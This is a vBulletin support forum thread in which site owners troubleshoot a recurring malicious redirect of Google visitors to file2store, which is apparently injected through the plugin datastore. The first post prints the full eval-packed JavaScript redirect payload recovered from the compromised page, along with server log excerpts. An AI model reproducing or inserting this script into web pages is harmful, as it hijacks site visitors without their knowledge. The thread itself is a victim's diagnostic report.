Information about file2store.info redirect. Solution?

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • Joep11
    Member
    • Apr 2005
    • 45

    Information about file2store.info redirect. Solution?

    One of our sites was hit by the redirect from google.

    In Google results page I right-clicked on our link and chose 'save link', so I saved our page without visiting it. I opened the page in notebook and this is what I got:

    <html><head></head><body><script type=
    "text/javascript">var vbsp='CA433C43';eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('o a=["\\A\\c\\e\\l\\d\\y\\c","\\k\\c\\e\\l\\d\\y\\c","\\B\\x\\c\\L\\f\\d\\q\\c\\k\\h","\\e\\b\\ M\\N\\l\\O\\e\\q\\d\\j\\A","\\w\\b\\b\\J\\d\\c","\\h","\\B\\x\\f\\r\\e\\n\\h\\i","\\G\\H\\ k\\f","\\I","\\p\\b\\w\\r\\e\\d\\b\\j","\\n\\e\\e\\f\\Q\\i\\i\\D\\d\\p\\c\\P\\k\\e\\b\\q\\ c\\C\\d\\j\\D\\b\\i\\m\\b\\S\\j\\p\\b\\r\\m\\C\\f\\n\\f\\T\\d\\m\\h"];E z(u,t){o g=F K();g[a[1]](g[a[0]]()+R);o s=a[2]+g[a[3]]();v[a[4]]=u+a[5]+t+s+a[6]};z(a[7],a[8]);v[a[9]]=a[V]+U;',58,58,'||||||||||_0x95ee|x6F|x65|x69|x74|x70|_0x601cx4|x3D|x2F|x6E|x73|x54|x64|x68|va r|x6C|x72|x61|_0x601cx5|_0x601cx3|_0x601cx2|document|x63|x20|x6D|ipbcc|x67|x3B|x2E|x66|fun ction|new|x76|x62|x31|x6B|Date|x78|x47|x4D|x53|x32|x3A|86400000|x77|x3F|vbsp|10'.split('|' ),0,{}))</script></body></html>
    When I open the page with this code in IE it goes to file2store.com.

    I can't find this code in my templates. Is it of any use defining where it comes from?


    I also noticed the following...

    In the error logs it shows:

    [Fri Jun 03 16:52:11 2011] [error] [client 77.245.91.19] PHP Warning: Call-time
    pass-by-reference has been deprecated - argument passed by value; If you would
    like to pass it by reference, modify the declaration of [runtime function
    name](). If you would like to enable call-time pass-by-reference, you can set
    allow_call_time_pass_reference to true in your INI file. However, future
    versions may not support this any longer. in
    /var/www/vhosts/nationaalautoforum.nl/httpdocs/includes/class_bbcode.php(172) :
    eval()'d code on line 7, referer: http://www.nationaalautoforum.nl/mijn-auto/

    many times. It started showing when the redirect stopped working.

    Anybody?


    The redirect is back and the errors have stopped! Why?

    The last error was at 17:12:22

    From access log:

    77.245.91.19 - - [03/Jun/2011:17:12:16 +0200] "GET
    /18905-fiat-presenteert-ruim-aangeklede-fiat-500-twinair.html HTTP/1.0" 200
    10354 "http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0 (compatible;
    Heritrix ; +http://www.buzzcapture.com)"
    66.249.72.100 - -
    [03/Jun/2011:17:12:16 +0200] "GET /volvo/ HTTP/1.1" 200 18828 "-" "Mozilla/5.0
    (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
    77.245.91.19 -
    - [03/Jun/2011:17:12:19 +0200] "GET /18939-vanafprijs-chevrolet-aveo.html
    HTTP/1.0" 200 10246 "http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0
    (compatible; Heritrix ; +http://www.buzzcapture.com)"
    77.245.91.19 - -
    [03/Jun/2011:17:12:22 +0200] "GET /18973-audi-prijst-q3.html HTTP/1.0" 200 10258
    "http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0 (compatible;
    Heritrix ; +http://www.buzzcapture.com)"
    93.125.201.157 - -
    [03/Jun/2011:17:12:25 +0200] "POST /register.php?do=checkdate HTTP/1.1" 200 5513
    "http://www.nationaalautoforum.nl/register.php" "Mozilla/4.0 (compatible; MSIE
    8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB7.0; SLCC2; .NET CLR 2.0.50727; .NET
    CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)"

    77.245.91.19 - - [03/Jun/2011:17:12:25 +0200] "GET
    /18916-nissan-leaf-veiligste-ev-ooit-met-5-ncap-sterren.html HTTP/1.0" 200 10380
    "http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0 (compatible;
    Heritrix ; +http://www.buzzcapture.com)"
    77.245.91.19 - -
    [03/Jun/2011:17:12:29 +0200] "GET
    /18917-belastingvoordeel-zuinige-auto-s-verdwijnt.html HTTP/1.0" 200 11546
    "http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0 (compatible;
    Heritrix ; +http://www.buzzcapture.com)"

    There is nothing strange to see...?
  • Joep11
    Member
    • Apr 2005
    • 45

    #2
    Sorry, running 3.8.7 not 4.x. Can someone move this thread?

    Comment

    • Steve Machol
      Former Customer Support Manager
      • Jul 2000
      • 154488

      #3
      Do you have the same redirect issues if you remove or disable vBSEO? Are you running the latest version of vBSEO?
      Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
      Change CKEditor Colors to Match Style (for 4.1.4 and above)

      Steve Machol Photography


      Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.


      Comment

      • Lynne
        Former vBulletin Support
        • Oct 2004
        • 26255

        #4
        And have you updated your files because of the yui security exploit?


        Please don't PM or VM me for support - I only help out in the threads.
        vBulletin Manual & vBulletin 4.0 Code Documentation (API)
        Want help modifying your vbulletin forum? Head on over to vbulletin.org
        If I post CSS and you don't know where it goes, throw it into the additional.css template.

        W3Schools &lt;- awesome site for html/css help

        Comment

        • Steve Machol
          Former Customer Support Manager
          • Jul 2000
          • 154488

          #5
          Actually 3.8.7 is not affected by the known YUI security issue: http://yuilibrary.com/support/2.8.2/
          Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
          Change CKEditor Colors to Match Style (for 4.1.4 and above)

          Steve Machol Photography


          Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.


          Comment

          • Lynne
            Former vBulletin Support
            • Oct 2004
            • 26255

            #6
            Yes, you are right, Steve. I need more coffee!

            Please don't PM or VM me for support - I only help out in the threads.
            vBulletin Manual & vBulletin 4.0 Code Documentation (API)
            Want help modifying your vbulletin forum? Head on over to vbulletin.org
            If I post CSS and you don't know where it goes, throw it into the additional.css template.

            W3Schools &lt;- awesome site for html/css help

            Comment

            • Joep11
              Member
              • Apr 2005
              • 45

              #7
              Originally posted by Steve Machol
              Do you have the same redirect issues if you remove or disable vBSEO? Are you running the latest version of vBSEO?
              When I disable any plugin it stops temporarely.

              It started 22/23 of April. At that time...

              vb: 3.8.5
              vbseo: 3.5
              vbseo sitemap: 2.5

              Now it's all last version of course.

              Originally posted by Lynne
              And have you updated your files because of the yui security exploit?

              http://www.vbulletin.com/forum/showt...or-4.X-and-3.X
              Now I have. Not at that time of course.

              Comment

              • Steve Machol
                Former Customer Support Manager
                • Jul 2000
                • 154488

                #8
                Originally posted by Joep11
                When I disable any plugin it stops temporarely.
                That means the issue is with your add-ons, not vB. At the very least you should upgrade to the latest versions of vBSEO and vBSEO Sitemap, then contact them if you have further issues.
                Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
                Change CKEditor Colors to Match Style (for 4.1.4 and above)

                Steve Machol Photography


                Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.


                Comment

                • Zachery
                  Former vBulletin Support
                  • Jul 2002
                  • 59097

                  #9
                  If you want to put in a support ticket with my attention, provide me with ssh, phpmyadmin, and admincp access I can dig around, but I would do what steve suggests.

                  Comment

                  • Joep11
                    Member
                    • Apr 2005
                    • 45

                    #10
                    Originally posted by Steve Machol
                    That means the issue is with your add-ons, not vB. At the very least you should upgrade to the latest versions of vBSEO and vBSEO Sitemap, then contact them if you have further issues.
                    Like I said, versions are up-to-date now. But the redirect keeps turning back.

                    Thanks for your quick respons.

                    Comment

                    • Joep11
                      Member
                      • Apr 2005
                      • 45

                      #11
                      Originally posted by Zachery
                      If you want to put in a support ticket with my attention, provide me with ssh, phpmyadmin, and admincp access I can dig around, but I would do what steve suggests.
                      I will put in a support ticket. Thanks.

                      Btw: at 8:47 pm I disabled another plugin than vbseo and the redirect disappeared. Like I said earlier I get errors like

                      [Sat Jun 04 22:45:18 2011] [error] [client 66.249.66.195] PHP Warning: Call-time
                      pass-by-reference has been deprecated - argument passed by value; If you would
                      like to pass it by reference, modify the declaration of [runtime function
                      name](). If you would like to enable call-time pass-by-reference, you can set
                      allow_call_time_pass_reference to true in your INI file. However, future
                      versions may not support this any longer. in
                      /var/www/vhosts/nationaalautoforum.nl/httpdocs/includes/class_bbcode.php(172) :
                      eval()'d code on line 7

                      At this moment the redirect is not yet back, but it can take a day.

                      Comment

                      • Joep11
                        Member
                        • Apr 2005
                        • 45

                        #12
                        We still do not know where it comes from.

                        - vbulletin looked into it and according to them it was in the datastore plugin bit, but not in de plugins themselves. Despite that the redirect keeps turning back after rebuilding the datastore

                        - we emptied the web dir (all binaries were stored in the database) and installed vbulletin and vbseo fresh; only the vbseo settings were exported and imported, but can't find strange things in that file; the redirect still returns

                        Comment

                        • Jason Dunn
                          New Member
                          • Jul 2006
                          • 29

                          #13
                          I've been hit by this @#?ing hack five times now and I'm really sick of it. I thought I fixed it last week when I updated vbSEO and vbSEO Sitemap Generator to the latest versions. Today I did a search in Chrome incognito window that would show me my forums, and the damn script is back!

                          If I disable vbSEO and the sitemap generator, I don't get the re-direct.

                          When I enabled Sitemap Generator, I don't get the re-direct.

                          When I enabled vbSEO, I don't get the re-direct.

                          So is there some file that is generated when vbSEO and the Sitemap generator are turned on and that file is getting hacked?

                          This entire thing baffles me - I've never had such a persistent problem like this before!

                          Comment

                          • Ace
                            Senior Member
                            • Apr 2004
                            • 4051
                            • 4.2.X

                            #14
                            Have you looked at your access logs? Specifically, for plugin.php being accessed from an IP that isn't yours?

                            I was affected by this for a while, I ended up .htaccess protecting my admincp, with a global IP deny, except for mine.
                            My Live vB5 Site - NZEating.com
                            vBulletin Hosting | vBulletin Services - Need hosting for your vB? Need it installed? Something else? Let me take that hassle off your hands.

                            Comment

                            • Zachery
                              Former vBulletin Support
                              • Jul 2002
                              • 59097

                              #15
                              The exploit is being injected into the datastore table directly. Every forum I've run into has some hacks. Though I should have really compiled a list.

                              Easy temp fix is to enable and disable a plugin, to rebuild the cache.

                              Comment

                              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...